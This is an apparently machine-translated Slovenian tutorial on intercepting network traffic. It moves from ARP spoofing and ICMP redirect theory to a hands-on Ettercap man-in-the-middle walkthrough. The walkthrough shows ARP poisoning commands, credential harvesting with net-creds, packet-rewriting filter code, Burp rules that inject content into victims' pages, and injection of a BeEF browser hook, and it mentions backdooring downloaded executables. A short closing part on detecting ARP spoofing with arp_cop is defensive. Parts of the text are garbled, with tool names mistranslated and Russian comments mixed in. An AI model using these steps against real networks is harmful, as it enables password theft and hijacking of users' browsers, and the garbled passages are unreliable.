domov › Namestitev in konfiguracija › Hekerji ga uporabljajo za preusmerjanje prometa. Metode hekerskih napadov. Prevara podatkov z Burpom

Hekerji ga uporabljajo za preusmerjanje prometa. Metode hekerskih napadov. Prevara podatkov z Burpom

Metode za prestrezanje omrežnega prometa

Poslušanje omrežja z uporabo programov za analizo omrežja je prvo, največ na preprost način prestrezanje podatkov.

Za zaščito pred prisluškovanjem omrežju uporabite posebni programi, na primer AntiSniff, ki je sposoben identificirati računalnike v omrežju, ki poslušajo omrežni promet.

Za rešitev svojih težav antisniffer programi uporabljajo poseben znak prisotnosti prisluškovalnih naprav v omrežju - omrežna kartica vohalnega računalnika mora biti v posebnem načinu poslušanja. Medtem ko so v načinu poslušanja, se omrežni računalniki na poseben način odzovejo na datagrame IP, poslane gostitelju, ki se testira. Na primer, poslušajoči gostitelji običajno obdelajo ves dohodni promet, ne le datagramov, poslanih na naslov gostitelja. Obstajajo tudi drugi znaki, ki kažejo na sumljivo vedenje gostitelja, ki jih AntiSniff lahko prepozna.

Nedvomno je prisluškovanje zelo koristno z vidika napadalca, saj omogoča pridobitev številnih koristnih informacij - gesel, ki se prenašajo po omrežju, naslovov omrežnih računalnikov, zaupnih podatkov, pisem itd. Vendar preprosto prisluškovanje hekerju ne dovoljuje poseganja v omrežno komunikacijo med dvema gostiteljema, da bi spremenil in poškodoval podatke. Za rešitev takšnega problema je potrebna bolj zapletena tehnologija.

riž. 1 Lažne zahteve ARP

Poglejmo, kako lahko heker uporabi ARP za prestrezanje omrežne komunikacije med gostiteljema A in B.

Da bi prestregel omrežni promet med gostiteljema A in B, heker tem gostiteljem vsili svoj naslov IP, tako da A in B uporabljata ta ponarejeni naslov IP pri izmenjavi sporočil. Za vsiljevanje svojega naslova IP heker izvede naslednje operacije.

Napadalec določi naslove MAC gostiteljev A in B na primer z ukazom nbtstat iz paketa W2RK.
Napadalec pošilja sporočila na identificirana MAC naslova gostiteljev A in B, ki so ponarejeni ARP odgovori na zahteve za razrešitev IP naslovov gostiteljev v MAC naslove računalnikov. Gostitelj A je obveščen, da naslov IP gostitelja B ustreza naslovu MAC napadalčevega računalnika; gostitelj B je obveščen, da naslov IP gostitelja A ustreza tudi naslovu MAC napadalčevega računalnika.
Gostitelja A in B shranita prejete naslove MAC v svoje predpomnilnike ARP in jih nato uporabita za pošiljanje sporočil drug drugemu. Ker naslova IP A in B ustrezata naslovu MAC napadalčevega računalnika, gostitelja A in B nič hudega sluteča komunicirata prek posrednika, ki lahko z njunimi sporočili naredi karkoli.

Za zaščito pred takšnimi napadi morajo skrbniki omrežja vzdrževati zbirko podatkov s tabelo ujemanja med naslovi MAC in naslovi IP svojih omrežnih računalnikov.

V omrežjih UNIX je to vrsto lažnega napada na zahtevo ARP mogoče izvesti s sistemskimi pripomočki za spremljanje in upravljanje omrežnega prometa, na primer arpredirect. Na žalost se zdi, da takšni zanesljivi pripomočki niso implementirani v omrežjih Windows. Na spletnem mestu NTsecurity lahko na primer prenesete pripomoček GrabitAII, predstavljen kot orodje za preusmerjanje prometa med omrežnimi gostitelji. Vendar že osnovno preverjanje funkcionalnosti pripomočka GrabitAII pokaže, da je do popolnega uspeha pri izvajanju njegovih funkcij še daleč.

Za prestrezanje omrežnega prometa lahko napadalec ponaredi pravi naslov IP omrežnega usmerjevalnika s svojim lastnim naslovom IP, pri čemer na primer uporabi ponarejena sporočila ICMP Redirect. Gostitelj A mora v skladu z RFC-1122 zaznati prejeto sporočilo o preusmeritvi kot odgovor na datagram, poslan drugemu gostitelju, na primer B. Gostitelj A določi svoja dejanja glede sporočila o preusmeritvi na podlagi vsebine prejetega sporočila o preusmeritvi, in če je preusmeritev datagrama določena v Preusmeri od A do B po novi poti, bo to storil točno to.

riž. 2 Napačno usmerjanje

Za lažno usmerjanje mora napadalec poznati nekaj podrobnosti o organizaciji lokalno omrežje, v katerem se nahaja gostitelj A, zlasti naslov IP usmerjevalnika, prek katerega se pošilja promet od gostitelja A do B. Če to ve, bo napadalec ustvaril datagram IP, v katerem je naslov IP pošiljatelja definiran kot IP usmerjevalnika naslov, prejemnik pa je naveden gostitelj A. V datagram je vključeno tudi sporočilo o preusmeritvi ICMP z naslovom novega usmerjevalnika, nastavljenim na naslov IP napadalčevega računalnika. Po prejemu takega sporočila bo gostitelj A vsa sporočila poslal na naslov IP napadalčevega računalnika.

Za zaščito pred takšnim napadom morate onemogočiti (na primer s požarnim zidom) obdelavo sporočil ICMP Redirect na gostitelju A, ukaz tracert (v Unixu je to ukaz tracerout) pa lahko razkrije naslov IP napadalčevega računalnika. . Ti pripomočki so sposobni najti dodatno pot, ki se je pojavila v lokalnem omrežju in ki ni bila predvidena med namestitvijo, razen če je seveda skrbnik omrežja pozoren.

Zgornji primeri prestrezanja (na katere zmožnosti napadalcev še zdaleč niso omejene) nas prepričajo o nujnosti zaščite podatkov, ki se prenašajo po omrežju, če podatki vsebujejo zaupne informacije. Edini način zaščite pred prestrezanjem omrežnega prometa je uporaba programov, ki izvajajo kriptografske algoritme in šifrirne protokole ter preprečujejo razkritje in zamenjavo tajnih podatkov. Za rešitev takšnih težav kriptografija zagotavlja sredstva za šifriranje, podpisovanje in preverjanje pristnosti sporočil, ki se prenašajo prek varnih protokolov.

Praktično izvajanje vseh kriptografskih metod za zaščito izmenjave informacij zagotavlja omrežja VPN(Virtual Private Network - Navidezna zasebna omrežja).

Prestrezanje povezave TCP

Najbolj sofisticiran napad prestrezanja omrežnega prometa je treba obravnavati kot zajem TCP povezave (TCP hijacking), ko heker prekine trenutno komunikacijsko sejo z gostiteljem tako, da ustvari in pošlje pakete TCP napadenemu gostitelju. Nato heker z uporabo zmožnosti protokola TCP za obnovitev prekinjene povezave TCP prestreže prekinjeno komunikacijsko sejo in jo nadaljuje namesto prekinjenega odjemalca.

Protokol TCP (Transmission Control Protocol) je eden izmed osnovnih transportnih protokolov. ravni OSI, ki vam omogoča vzpostavitev logičnih povezav prek virtualnega komunikacijskega kanala. Po tem kanalu se prenašajo in sprejemajo paketi s posnetim zaporedjem, nadzoruje se pretok paketov, organizira retransmisija popačenih paketov in na koncu seje se komunikacijski kanal prekine. TCP je edini protokol osnovni protokol iz družine TCP/IP, ki ima napreden sistem identifikacije in povezovanja sporočil.

Pregled programske opreme za vohanje paketov

Vse vohače programske opreme lahko razdelimo v dve kategoriji: vohače, ki podpirajo zagon iz ukazna vrstica, in vohala z grafičnim vmesnikom. Vendar ugotavljamo, da obstajajo vohalniki, ki združujejo obe zmožnosti. Poleg tega se snifferji med seboj razlikujejo po protokolih, ki jih podpirajo, globini analize prestreženih paketov, možnosti nastavitve filtrov in možnosti združljivosti z drugimi programi.

Običajno okno katerega koli snifferja z grafični vmesnik sestavljajo tri področja. Prvi od njih prikazuje povzetek podatkov o prestreženih paketih. Običajno je v tem območju prikazano najmanj polj, in sicer: čas prestrezanja paketa; IP naslova pošiljatelja in prejemnika paketa; MAC naslova pošiljatelja in prejemnika paketa, izvorna in ciljna naslova vrat; vrsta protokola (omrežna, transportna ali aplikacijska plast); nekaj povzetkov informacij o prestreženih podatkih. V drugem delu so prikazani statistični podatki o posameznem izbranem paketu, v tretjem delu pa je prikazan paket v šestnajstiški ali ASCII obliki.

Skoraj vsi paketni snifferji vam omogočajo analizo dekodiranih paketov (zato se paketni snifferji imenujejo tudi analizatorji paketov ali analizatorji protokolov). Sniffer razdeli prestrežene pakete po slojih in protokolih. Nekatera vohala za pakete lahko prepoznajo protokol in prikažejo zajete informacije. Ta vrsta informacij je običajno prikazana v drugem območju okna vohljača. Vsako vohljanje lahko na primer prepozna protokol TCP, napredni vohalci pa lahko ugotovijo, katera aplikacija je ustvarila ta promet. Večina analizatorjev protokolov prepozna več kot 500 različnih protokolov in jih lahko opiše in dekodira po imenu. Več informacij kot lahko vohljalec dekodira in prikaže na zaslonu, manj jih bo treba dekodirati ročno.

Ena od težav, na katero lahko naletijo vohljači paketov, je nezmožnost pravilne identifikacije protokola z uporabo vrat, ki niso privzeta vrata. Na primer, za izboljšanje varnosti so lahko nekatere dobro znane aplikacije konfigurirane za uporabo vrat, ki niso privzeta vrata. Torej, namesto tradicionalnih vrat 80, rezerviranih za spletni strežnik, ta strežnik Lahko ga na silo znova konfigurirate na vrata 8088 ali katera koli druga. Nekateri analizatorji paketov v tej situaciji ne morejo pravilno določiti protokola in prikažejo le informacije o protokolu nižje ravni (TCP ali UDP).

Obstajajo programski vohalci, ki so opremljeni z analitičnimi moduli programske opreme kot vtičniki ali vgrajenimi moduli, ki vam omogočajo ustvarjanje poročil z uporabnimi analitičnimi informacijami o prestreženem prometu.

Druga značilnost večine analizatorjev programskih paketov je zmožnost konfiguriranja filtrov pred in po zajetju prometa. Filtri izberejo določene pakete iz splošnega prometa po danem kriteriju, kar vam omogoča, da se znebite nepotrebnih informacij pri analizi prometa.

Alternative za Ettercap

Ettercap je najbolj priljubljena programska oprema za napad človek-v-sredi, toda ali je najboljša? Skozi celotna navodila boste videli, da se Ettercap skoraj nikoli ne uporablja sam, da je z njim vedno zgrajen en ali drug program v verigi obdelave prometa. Morda to dodaja fleksibilnost; na splošno je ta pristop osnova UNIX-a - en program opravi eno nalogo, končni uporabnik pa kombinira različne programe, da doseže želeni rezultat. S tem pristopom je programsko kodo lažje vzdrževati, iz takšnih miniaturnih "opek" lahko zgradite sistem katere koli kompleksnosti in prilagodljivosti. Vendar imeti pet odprtih konzol z različnimi nalogami, katerih programi so namenjeni doseganju enega samega rezultata, ni zelo priročno, preprosto je bolj zapleteno, obstaja možnost napake na neki stopnji in celotna konfiguracija sistem bo deloval zaman.

Vohljanje Net-Creds:

Obiskani URL-ji
Poslane zahteve POST
prijave/gesla iz obrazcev HTTP
prijave/gesla za osnovno avtentikacijo HTTP
Iskanje HTTP
FTP prijave/gesla
IRC prijave/gesla
POP prijave/gesla
Prijave/gesla IMAP
Telnet prijave/gesla
SMTP prijave/gesla
Niz skupnosti SNMP
vsi podprti protokoli NTLMv1/v2, kot so HTTP, SMB, LDAP itd.
Kerberos

Dober izbor prestreženih, viseča mreža pa je v tem pogledu enostavnejša - prikazuje samo prestrežene slike.

Preklopite vaš stroj v način posredovanja.

Odmev "1" > /proc/sys/net/ipv4/ip_forward

Zaženite Ettercap z grafičnim vmesnikom (-G):

Ettercap-G

Zdaj izberite Gostitelji, tam je podpostavka Iskanje gostiteljev. Ko je pregled končan, izberite Seznam gostiteljev:

Kot Target1 izberite usmerjevalnik (Add to Target 1), kot Target2 izberite napravo, ki jo boste napadli (Add to Target 2).

Toda tukaj se lahko pojavi prva težava, še posebej, če je gostiteljev veliko. V različnih navodilih, vključno z zgoraj predstavljenim videoposnetkom, se avtorji povzpnejo na ciljni stroj (vsi iz nekega razloga imajo Windows) in z ukazom pogledajo IP tega stroja v lokalnem omrežju. Strinjam se, da je ta možnost za resnične razmere nesprejemljiva.

Če skenirate z uporabo, jih lahko dobite nekaj Dodatne informacije o gostiteljih, natančneje o proizvajalcu omrežne kartice:

Nmap -sn 192.168.1.0/24

Če podatki še vedno niso dovolj, lahko opravite skeniranje, da določite OS:

Nmap -O 192.168.1.0/24

Kot lahko vidimo, se je stroj z IP 192.168.1.33 izkazal za Windows, če to ni znak od zgoraj, kaj je potem? 😉 LOL

To dodajamo kot drugi cilj.

Zdaj pojdite na postavko menija Mitm. Tam izberite ARP poisoning ... Označite polje za Sniff remote connections.

Začnemo žeti, v enem oknu zaženemo

Neto krediti

v drugem (oba programa je mogoče zagnati brez možnosti)

viseča mreža

Zbiranje podatkov se je začelo takoj:

Na desni strani je viseča mreža odprla še eno okno, v katerem prikazuje prestrežene slike. V oknu net-creds vidimo obiskana spletna mesta in prestrežena gesla:

1.2 Ettercap + Burp Suite
3. Oglejte si podatke (obiskana mesta in zajeta gesla) v Ettercapu

V meniju Pogled imamo dostop do zavihkov Povezave in Profili. Potrdite lahko tudi polje Razreši naslove IP. Povezave so seveda povezave. Ettercap zbira profile v pomnilniku za vsakega gostitelja, ki ga odkrije. Tam so zbrani uporabniki in gesla. V tem primeru so profili z zajetimi podatki računa (gesla) označeni s križcem:

Ni se treba preveč zanašati na profile - na primer, označene so prestrežene prijave in gesla za FTP in druge storitve, za katere lahko program jasno interpretira prejete informacije kot poverilnice. To ne vključuje na primer osnovnih podatkov za preverjanje pristnosti, prijav in gesel, vnesenih v spletne obrazce.

V Connections so najbolj obetavni podatki označeni z zvezdico:

Za ogled podrobnosti lahko dvokliknete te vnose:

Da teh zvezdic ne bi iskali po celem seznamu, jih lahko razvrstite po tem polju in vse bodo prikazane na vrhu ali dnu:

Ujeta osnovna avtentikacija:

Prijavno geslo za Yandex (označeno spodaj):

To so prestrežene poverilnice za VKontakte:

Tudi najbolj zanimivi podatki so zbrani v spodnji konzoli:

Če želite shraniti rezultate programa, uporabite te možnosti (pri zagonu Ettercapa določite ključe:

Možnosti beleženja: -w, --write zapiši zajete podatke v pcapfile -L, --log zapiši ves promet v to -l, --log-info zapiši samo pasivne informacije v to -m, --log-msg zapiši vsa sporočila v tem -c, --compress uporabite stiskanje gzip za datoteke dnevnika

4. Sprotna zamenjava podatkov v Ettercapu
4.1 Uporaba filtrov po meri Ettercap

Opomba: Kljub vsem testiranjem mi filtri Ettercap še vedno niso delovali. Težko je razumeti, ali gre za roke, lastnosti strojne opreme ali napako v samem programu ... Toda za različico 0.8.2 (trenutno najnovejšo) obstaja poročilo o napakah s filtri. Na splošno, sodeč po poročilih o napakah in forumih, filtri pogosto odpadejo ali pa že dolgo sploh ne delujejo. Obstaja veja, kjer so bile spremembe narejene pred 5 meseci https://github.com/Ettercap/ettercap/tree/filter-improvements, tj. filter-improvements (z izboljšavami filtrov). Tako za to vejo kot za različico iz repozitorija je bilo narejenih najrazličnejših testov, testirani so bili različni filtri pod različnimi pogoji, porabljenega je bilo veliko časa, a rezultatov ni bilo. Mimogrede, če želite namestiti različico za izboljšave filtrov v Kali Linux, morate narediti naslednje:

Sudo apt-get odstrani ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-izboljšave https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../ make sudo make install

Na splošno, če vaši filtri ne delujejo, potem niste sami. V navodilih za Ettercap ne morem preskočiti teme filtrov, zato bodo o njih v vsakem primeru razpravljali.

Doslej smo uporabljali Ettercap za ponarejanje ARP. To je zelo površna aplikacija. Zahvaljujoč filtrom po meri lahko posredujemo in spreminjamo promet sproti. Filtri morajo biti v ločenih datotekah in jih je treba pred uporabo prevesti s programom Etterfilter. Čeprav se zdi dokumentacija, do katere je navedena povezava, skromna, vam bo skupaj s spodnjimi primeri omogočila pisanje precej zanimivih filtrov.

Ustvarimo naš prvi filter, ki bo zamenjal vse slike s tem:

V datoteki z imenom img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # opomba: nadomestni niz je enake dolžine kot prvotni msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); zamenjaj("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); zamenjaj("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); zamenjaj("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Prevedite datoteko:

Etterfilter img_replacer.filter -o img_replacer.ef

Rezultati kompilacije:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 naloženih protokolnih tabel: DEKODIRANI PODATKI udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 naloženih konstant: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Izvorna datoteka za razčlenjevanje "img_replacer.filter" končan. Razgrnitev metadrevesa končana. Pretvorba nalepk v dejanske odmike končana. Zapisovanje izhodnih podatkov v "img_replacer.ef" je končano. -> Skripta, kodirana v 18 navodil.

Stikalo -F pove programu, naj naloži filter iz datoteke, ki sledi stikalu. Po prevajanju je ime naše nove datoteke s filtrom img_replacer.ef, zato ima ukaz obliko:

Ettercap -G -F img_replacer.ef

Opomba: Ko spremljate spletni promet, so lahko paketi, ki jih vidite, v šifrirani obliki. Za učinkovito delo filtri, Ettercap potrebuje promet v obliki golo besedilo. Glede na nekatera opažanja je tip kodiranja, ki ga uporabljajo spletne strani, "Accept-Encoding: gzip, deflate"

Spodaj je filter, ki prepiše kodiranje in prisili komunikacijo v obliki navadnega besedila:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # opomba: štirje presledki v zamenjanem nizu msg ("pobelil gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # opomba: sedem presledkov v zamenjani vrstici msg("pobeljeno deflate\n"); ) )

Sintaksa za pisanje filtrov je podrobno opisana, nato pa je še nekaj primerov:

# zamenjava besedila v paketu: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # pokaži sporočilo, če so vrata tcp 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # zapiši celoten telnet promet, izvedite tudi ./program za vsak paket if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # zabeleži ves promet razen http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data, "./logfile.log"); ) # nekatere operacije na koristnem tovoru paketa if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modified"; DATA .data + 20 = 0x4445; ) # izpusti vse pakete, ki vsebujejo "ettercap" if (search(DECODED.data, "ettercap")) ( msg("nekdo govori o nas ...\n") ; drop( ); kill(); ) # zabeleži dešifrirane pakete ssh, ki se ujemajo z regularnim izrazom if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # ubijanje paketov if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Zamenjava podatkov z Burpom

Zaženemo Ettercap in Burp, kot je opisano v odstavku 1.2 ali v odstavku 2.2.

V Burpu pojdite na Proxy -> Možnosti. Tam najdemo Match in Replace. Kliknite Dodaj, da dodate novo pravilo.

Glava zahteve je glava zahteve
Telo zahteve - telo zahteve
Response header - odgovorna glava
Odzivno telo - odzivno telo
Ime parametra zahteve – ime parametra zahteve
Vrednost parametra zahteve – vrednost parametra zahteve
Prva vrstica zahteve – prva vrstica zahteve

Če morate spremeniti podatke, posredovane z metodo GET, potem to velja za glave.

V označevanju HTML obstaja tudi glava (oznaka glave). Zgoraj omenjeni nimajo nobene zveze s tem naslovom. Malo višje govorimo o glavah paketov. Če želite spremeniti vsebino HTML strani, potem vedno izberite Telo odgovora namesto Glava zahteve, tudi če boste spremenili vsebino oznake head (na primer naslov).

Če niste seznanjeni z regularni izrazi, potem načeloma ni razloga za skrb: HTML marsikaj odpušča in česar ne razume, preprosto ignorira - lahko ga uporabite. Če znaš uporabljati regularne izraze, te spoštujem.)))

Na primer, ustvarimo novo pravilo in spremenimo glavo zahteve v telo odgovora. V samem pravilu bomo spremenili

Brez naslova

Označite polje za ujemanje regularnega izraza.

Zdaj bo na vseh spletnih mestih (brez HTTPS) naslov Brez naslova:

Za oznako body vstavite poljubno vrstico (to bo prva vrstica v besedilu). Glava zahteve se spremeni v telo odgovora. Spremenimo se

Označite polje za ujemanje regularnega izraza.

V zgornjem desnem kotu (odvisno od postavitve) se pojavi napis "I am cool!". Vstavite lahko CSS, kodo JavaScript, poljubno besedilo - karkoli. Na splošno lahko odstranite vse s strani in jo nato napolnite s svojo vsebino - vse je odvisno od vaše domišljije.

Ideja je bila nekoliko spremeniti vsak obrazec, tako da bi bili podatki poslani na izvirni strežnik in na napadalčev strežnik (implementirajte večkratno predložitev za vsak obrazec). Toda ob sklepanju, da če poslani podatki niso šifrirani in imamo dostop do njih, potem jih že vidimo, jih ni treba pošiljati nobenemu strežniku. Če pa rabi kdo res delujoč primer pošiljanja podatkov iz enega obrazca na več strežnikov hkrati.

5. Priklop na BeEF

Če želimo začeti uporabljati zmožnosti BeEF, moramo v kodo HTML vdelati datoteko JavaScript, običajno vrstico, kot je:

Naslednji dve metodi se razlikujeta le v načinu vdelave tega niza.

5.1 Priključitev BeEF z uporabo filtrov Ettercap

[razdelek bo pripravljen pozneje]

5.2 Povezovanje BeEF z Burpom

Začeti morate točno tako, kot je zapisano v odstavku 4.2. Samo namesto zamenjave glav in dodajanja besedila na spletno mesto bomo kodo JavaScript implementirali v obliki vrstice:

V mojem primeru je ta datoteka na voljo na naslovu IP 192.168.1.36 na vratih 3000. Datoteka se imenuje hook.js (lahko spremenite v nastavitvah). Tisti. v mojem primeru moram vstaviti vrstico:

To lahko storite na primer tako, da ustvarite novo pravilo in spremenite glavo zahteve v telo odgovora. Zamenjava mora potekati v sami kodi HTML

Super, ko odprete katero koli spletno mesto, ki nima HTTPS, se v kodo HTML vstavi koda JavaScript, ki vam omogoča zbiranje informacij prek zasvojenega brskalnika in izvajanje različnih napadov:

6. Okužba z zadnjimi vrati

Izvedljive datoteke lahko zamenjate in okužite z uporabo filtrov Ettercap [ki iz nekega razloga ne delujejo več] in z aplikacije tretjih oseb. Na primer, BDFProxy lahko to stori sproti. Na žalost BDFProxy še vedno trpi zaradi posodobitve Backdoor Factory iz aprila 2016: paket libmproxy je bil v Pythonu preimenovan v mitmproxy. Za BDFProxy je paket libmproxy nujna odvisnost; brez tega paketa se program ne bo zagnal. Zato je zdaj, pred "popravilom" BDFProxy, nemogoče uporabljati, ker tudi z nameščenim Backdoor Factory program BDFProxy se pritožuje nad odsotnostjo knjižnice libmproxy ...

Podobno operacijo lahko izvedete z Burp Suite. Predstavljen je algoritem po korakih, ki ga v tem razdelku nima smisla ponovno pisati.

7. Uporaba vtičnikov Ettercap

Informacije o vtičnikih Ettercap lahko najdete. Vtičnikov je kar veliko, najbolj zanimivi se mi zdijo spodaj opisani.

Vtičnike lahko povežete, ko zaženete Ettercap, za to obstaja možnost:

P, --plugin zaženi to

Vtičnike je mogoče naložiti tudi iz GUI:

[GRADIVO V PRIPRAVI]

7.1 arp_cop

Poroča o sumljivi dejavnosti ARP s pasivnim spremljanjem zahtev/odgovorov ARP. Lahko poroča o poskusih zastrupitve z ARP ali preprostih sporih IP ali spremembah IP. Če sestavljate začetni seznam gostiteljev, bo vtičnik deloval natančneje.

Ettercap -TQP arp_cop //

Primer resničnega odkrivanja ponarejanja ARP:

Razširi

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // geslo za mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Posluša na: eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 255.255.255.0 fe80::a00:27ff:fea3:84a/64 Razčlenitev SSL potrebuje veljaven skript "redir_command_on" v datoteki etter.conf Privilegiji so padli na EUID 65534 EGID 65534... 33 vtičnikov 42 disektorjev protokolov 57 nadzorovanih vrat 20530 mac prodajalec prstni odtis 1766 tcp OS prstni odtis 2182 znane storitve Naključno izbiranje 255 gostiteljev za skeniranje ... Pregledovanje celotne omrežne maske za 255 gostiteljev ... * |====== ================ ============================>| 100,00 % 3 gostitelji dodani na seznam gostiteljev ... Zagon poenotenega vohanja ... Samo besedilni vmesnik aktiviran ... Pritisnite "h" za vgrajeno pomoč Aktiviranje vtičnika arp_cop ... arp_cop: vtičnik se izvaja ... arp_cop: (nov gostitelj ) 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja naj bo 192.168.1.1 arp_cop: ( OPOZORILO ) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_co p: (POZOR) 192.168.1.35 se pretvarja, da be 192.168 .1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 pretvarja naj bo 192.1 68.1.1 arp_cop: ( OPOZORILO) 192.168 .1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_co p: (OPOZORILO) 192.1 68.1.35 se pretvarja, da be 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja biti 192.168.1. 1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop : (OPOZORILO) 192.168.1.3 5 pretvarja biti 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja naj bo 192.168.1.1 arp_cop : ( OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop : (OPOZORILO) 192.168.1.35 se pretvarja, da je 192. 168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 19 2.168.1.1 arp_cop: (OPOZORILO ) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (WA RNING ) 192.168.1.35 se pretvarja, da je 192.168 1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192. 16 8.1.1 arp_cop: (OPOZORILO) 192.168. 1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO) 192.168.1.35 se pretvarja, da je 192.168.1.1 arp_cop: (OPOZORILO ING) 192.16 8.1.35 se pretvarja, da je 192.168 .1.1. ........................

7.2 samodejno dodajanje

Samodejno bo dodal nove žrtve, ko se povežejo z napadom ARP poisoning mitm. Išče zahteve ARP v lokalnem omrežju in če jih zazna, doda gostitelja na seznam žrtev, če je bil seznam naveden kot TARGET. Gostitelj je dodan, ko je iz njega vidna zahteva arp.

7.3 chk_poison

Preveri, ali so moduli arp etch v ettercapu uspešni. Vsem žrtvam vab pošlje ponarejene odmevne pakete ICMP, medtem ko se pretvarja, da je vsaka žrtev. Lahko ujame odgovor ICMP z našim MAC naslovom kot ciljem, kar pomeni, da je vaba med obema tarčama uspešna. Preveri obe poti vsake povezave.

7.4 dns_spoof

